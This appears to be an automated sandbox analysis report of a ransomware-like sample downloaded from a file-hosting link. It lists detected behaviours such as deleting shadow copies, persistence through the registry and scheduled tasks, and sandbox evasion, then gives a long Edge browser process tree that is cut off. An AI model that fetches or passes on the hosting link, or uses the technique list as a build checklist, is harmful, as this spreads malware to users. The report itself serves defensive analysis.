Analysis

  • max time kernel
    216s
  • max time network
    217s
  • platform
    windows10-ltsc_2021_x64
  • resource
    win10ltsc2021-20250314-en
  • resource tags

    arch:x64arch:x86image:win10ltsc2021-20250314-enlocale:en-usos:windows10-ltsc_2021-x64system
  • submitted
    02/04/2025, 14:30

General

Malware Config

Signatures

  • Modifies WinLogon for persistence 2 TTPs 2 IoCs
  • Deletes shadow copies 3 TTPs

    Ransomware often targets backup files to inhibit system recovery.

  • Looks for VirtualBox Guest Additions in registry 2 TTPs 3 IoCs
  • Renames multiple (61) files with added filename extension

    This suggests ransomware activity of encrypting all the files on the system.

  • Disables Task Manager via registry modification
  • Downloads MZ/PE file 1 IoCs
  • Event Triggered Execution: AppInit DLLs 1 TTPs

    Adversaries may establish persistence and/or elevate privileges by executing malicious content triggered by AppInit DLLs loaded into processes.

  • Looks for VMWare Tools registry key 2 TTPs 3 IoCs
  • Possible privilege escalation attempt 2 IoCs
  • Checks BIOS information in registry 2 TTPs 6 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 4 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 5 IoCs
  • Loads dropped DLL 64 IoCs
  • Modifies file permissions 1 TTPs 2 IoCs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 5 IoCs
  • Looks up external IP address via web service 1 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Maps connected drives based on registry 3 TTPs 6 IoCs

    Disk information is often read in order to detect sandboxing environments.

  • Command and Scripting Interpreter: PowerShell 1 TTPs 1 IoCs

    Start PowerShell.

  • Drops file in System32 directory 7 IoCs
  • Drops file in Windows directory 64 IoCs
  • Browser Information Discovery 1 TTPs

    Enumerate browser information.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 24 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Enumerates system info in registry 2 TTPs 9 IoCs
  • Interacts with shadow copies 3 TTPs 1 IoCs

    Shadow copies are often targeted by ransomware to inhibit system recovery.

  • Modifies data under HKEY_USERS 4 IoCs
  • Modifies registry class 7 IoCs
  • Modifies registry key 1 TTPs 2 IoCs
  • Scheduled Task/Job: Scheduled Task 1 TTPs 40 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious behavior: GetForegroundWindowSpam 1 IoCs
  • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary 13 IoCs
  • Suspicious use of AdjustPrivilegeToken 19 IoCs
  • Suspicious use of FindShellTrayWindow 64 IoCs
  • Suspicious use of SendNotifyMessage 64 IoCs
  • Suspicious use of SetWindowsHookEx 1 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs
  • Uses Task Scheduler COM API 1 TTPs

    The Task Scheduler COM API can be used to schedule applications to run on boot or at set times.

  • Uses Volume Shadow Copy WMI provider

    The Volume Shadow Copy service is used to manage backups/snapshots.

  • Uses Volume Shadow Copy service COM API

    The Volume Shadow Copy service is used to manage backups/snapshots.

Processes

  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --start-maximized --single-argument https://gofile.io/d/EDCgVR
    1⤵
    • Drops file in Windows directory
    • Checks processor information in registry
    • Enumerates system info in registry
    • Modifies data under HKEY_USERS
    • Modifies registry class
    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
    • Suspicious use of FindShellTrayWindow
    • Suspicious use of SendNotifyMessage
    • Suspicious use of WriteProcessMemory
    PID:1248
    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x290,0x7ffa053bf208,0x7ffa053bf214,0x7ffa053bf220
      2⤵
        PID:2624
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=1980,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=2260 /prefetch:3
        2⤵
        • Downloads MZ/PE file
        PID:1756
      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --subproc-heap-profiling --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2232,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=2228 /prefetch:2
        2⤵
          PID:1556
        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=2444,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=2604 /prefetch:8
          2⤵
            PID:556
          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --subproc-heap-profiling --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=6 --always-read-main-dll --field-trial-handle=3524,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=3552 /prefetch:1
            2⤵
              PID:4808
            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --subproc-heap-profiling --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=5 --always-read-main-dll --field-trial-handle=3540,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=3568 /prefetch:1
              2⤵
                PID:4780
              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --subproc-heap-profiling --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=7 --always-read-main-dll --field-trial-handle=5060,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=5076 /prefetch:1
                2⤵
                  PID:5648
                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=4844,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=4824 /prefetch:8
                  2⤵
                    PID:768
                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=5288,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=5304 /prefetch:8
                    2⤵
                      PID:1680
                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=5596,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=5664 /prefetch:8
                      2⤵
                        PID:3012
                      • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                        "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=5668,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=5808 /prefetch:8
                        2⤵
                          PID:756
                        • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                          "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=5668,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=5808 /prefetch:8
                          2⤵
                            PID:1828
                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=6064,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=6076 /prefetch:8
                            2⤵
                              PID:3496
                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --subproc-heap-profiling --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=6104,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=6244 /prefetch:1
                              2⤵
                                PID:2076
                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=6076,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=3748 /prefetch:8
                                2⤵
                                  PID:4860
                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_collections.mojom.CollectionsDataManager --lang=en-US --service-sandbox-type=collections --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=6476,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=6612 /prefetch:8
                                  2⤵
                                    PID:4944
                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --subproc-heap-profiling --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=18 --always-read-main-dll --field-trial-handle=5896,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=6636 /prefetch:1
                                    2⤵
                                      PID:2780
                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=quarantine.mojom.Quarantine --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=6924,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=6920 /prefetch:8
                                      2⤵
                                        PID:1852
                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilReadIcon --lang=en-US --service-sandbox-type=icon_reader --video-capture-use-gpu-memory-buffer --string-annotations --subproc-heap-profiling --always-read-main-dll --field-trial-handle=6988,i,12733891205087025620,7824960500487469122,262144 --variations-seed-version --mojo-platform-channel-handle=6948 /prefetch:8
                                        2⤵
                                          PID:1648
                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
                                          2⤵
                                          • Drops file in Windows directory
                                          • Checks processor information in registry
                                          • Enumerates system info in registry
                                          • Modifies data under HKEY_USERS
                                          • Modifies registry class
                                          • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                          • Suspicious use of FindShellTrayWindow
                                          • Suspicious use of SendNotifyMessage
                                          PID:4532
                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x2cc,0x7ffa053bf208,0x7ffa053bf214,0x7ffa053bf220
                                            3⤵
                                              PID:1484
                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1832,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=2264 /prefetch:3
                                              3⤵
                                                PID:4456
                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2236,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=2232 /prefetch:2
                                                3⤵
                                                  PID:2560
                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2556,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=2744 /prefetch:8
                                                  3⤵
                                                    PID:5168
                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4332,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:8
                                                    3⤵
                                                      PID:5456
                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4332,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=4356 /prefetch:8
                                                      3⤵
                                                        PID:5548
                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4508,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=4516 /prefetch:8
                                                        3⤵
                                                          PID:4436
                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=9 --always-read-main-dll --field-trial-handle=4784,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=4840 /prefetch:1
                                                          3⤵
                                                            PID:5156
                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --instant-process --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=8 --always-read-main-dll --field-trial-handle=4792,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=4868 /prefetch:1
                                                            3⤵
                                                              PID:4384
                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=asset_store.mojom.AssetStoreService --lang=en-US --service-sandbox-type=asset_store_service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5472,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=5480 /prefetch:8
                                                              3⤵
                                                                PID:2256
                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=entity_extraction_service.mojom.Extractor --lang=en-US --service-sandbox-type=entity_extraction --onnx-enabled-for-ee --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5484,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=5560 /prefetch:8
                                                                3⤵
                                                                  PID:1288
                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6020,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=6072 /prefetch:8
                                                                  3⤵
                                                                    PID:5616
                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=14 --always-read-main-dll --field-trial-handle=5868,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=6256 /prefetch:1
                                                                    3⤵
                                                                      PID:5176
                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=15 --always-read-main-dll --field-trial-handle=5860,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=5584 /prefetch:1
                                                                      3⤵
                                                                        PID:1336
                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=renderer --string-annotations --pdf-upsell-enabled --video-capture-use-gpu-memory-buffer --lang=en-US --js-flags=--ms-user-locale= --device-scale-factor=1 --num-raster-threads=4 --enable-main-frame-before-activation --renderer-client-id=16 --always-read-main-dll --field-trial-handle=5988,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=6644 /prefetch:1
                                                                        3⤵
                                                                          PID:224
                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=7056,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=5984 /prefetch:8
                                                                          3⤵
                                                                            PID:2732
                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6832,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=6516 /prefetch:8
                                                                            3⤵
                                                                              PID:1952
                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=chrome.mojom.UtilWin --lang=en-US --service-sandbox-type=none --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=6636,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=7248 /prefetch:8
                                                                              3⤵
                                                                                PID:4336
                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=edge_search_indexer.mojom.SearchIndexerInterfaceBroker --lang=en-US --service-sandbox-type=search_indexer --message-loop-type-ui --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5672,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=5648 /prefetch:8
                                                                                3⤵
                                                                                  PID:1124
                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=unzip.mojom.Unzipper --lang=en-US --service-sandbox-type=service --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=5048,i,3319072476165333679,2918354770134666703,262144 --variations-seed-version --mojo-platform-channel-handle=5112 /prefetch:8
                                                                                  3⤵
                                                                                    PID:1784
                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                    "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --no-startup-window
                                                                                    3⤵
                                                                                    • Drops file in Windows directory
                                                                                    • Checks processor information in registry
                                                                                    • Enumerates system info in registry
                                                                                    • Modifies data under HKEY_USERS
                                                                                    • Modifies registry class
                                                                                    • Suspicious behavior: NtCreateUserProcessBlockNonMicrosoftBinary
                                                                                    PID:5508
                                                                                    • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                      "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=crashpad-handler "--user-data-dir=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data" /prefetch:4 --monitor-self-annotation=ptype=crashpad-handler "--database=C:\Users\Admin\AppData\Local\Microsoft\Edge\User Data\Crashpad" --annotation=IsOfficialBuild=1 --annotation=channel= --annotation=chromium-version=133.0.6943.99 "--annotation=exe=C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --annotation=plat=Win64 --annotation=prod=Edge --annotation=ver=133.0.3065.69 --initial-client-data=0x264,0x268,0x26c,0x260,0x28c,0x7ffa053bf208,0x7ffa053bf214,0x7ffa053bf220
                                                                                      4⤵
                                                                                        PID:5396
                                                                                      • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                        "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=network.mojom.NetworkService --lang=en-US --service-sandbox-type=none --string-annotations --always-read-main-dll --field-trial-handle=1896,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=2336 /prefetch:3
                                                                                        4⤵
                                                                                          PID:2580
                                                                                        • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                          "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=gpu-process --string-annotations --gpu-preferences=UAAAAAAAAADgAAAEAAAAAAAAAAAAAAAAAABgAAEAAAAAAAAAAAAAAAAAAAACAAAAAAAAAAAAAAAAAAAAAAAAABAAAAAAAAAAEAAAAAAAAAAIAAAAAAAAAAgAAAAAAAAA --always-read-main-dll --field-trial-handle=2308,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=2304 /prefetch:2
                                                                                          4⤵
                                                                                            PID:5816
                                                                                          • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                            "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=storage.mojom.StorageService --lang=en-US --service-sandbox-type=service --string-annotations --always-read-main-dll --field-trial-handle=2372,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=2380 /prefetch:8
                                                                                            4⤵
                                                                                              PID:2620
                                                                                            • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
                                                                                              "C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe" --type=utility --utility-sub-type=PooledProcess2 --lang=en-US --service-sandbox-type=utility --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4248,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=4256 /prefetch:8
                                                                                              4⤵
                                                                                                PID:3236
                                                                                              • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4488,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=4372 /prefetch:8
                                                                                                4⤵
                                                                                                  PID:5296
                                                                                                • C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe
                                                                                                  "C:\Program Files (x86)\Microsoft\Edge\Application\133.0.3065.69\identity_helper.exe" --type=utility --utility-sub-type=winrt_app_id.mojom.WinrtAppIdService --lang=en-US --service-sandbox-type=none --video-capture-use-gpu-memory-buffer --string-annotations --always-read-main-dll --field-trial-handle=4488,i,6920964938061681248,8807775465035364022,262144 --variations-seed-version --mojo-platform-channel-handle=4372 /prefetch:8
                                                                                                  4⤵
                                                                                                    PID:2288
                                                                                                  • C:\Program Files (x86)\Microsoft\Edge\Application\msedge.exe
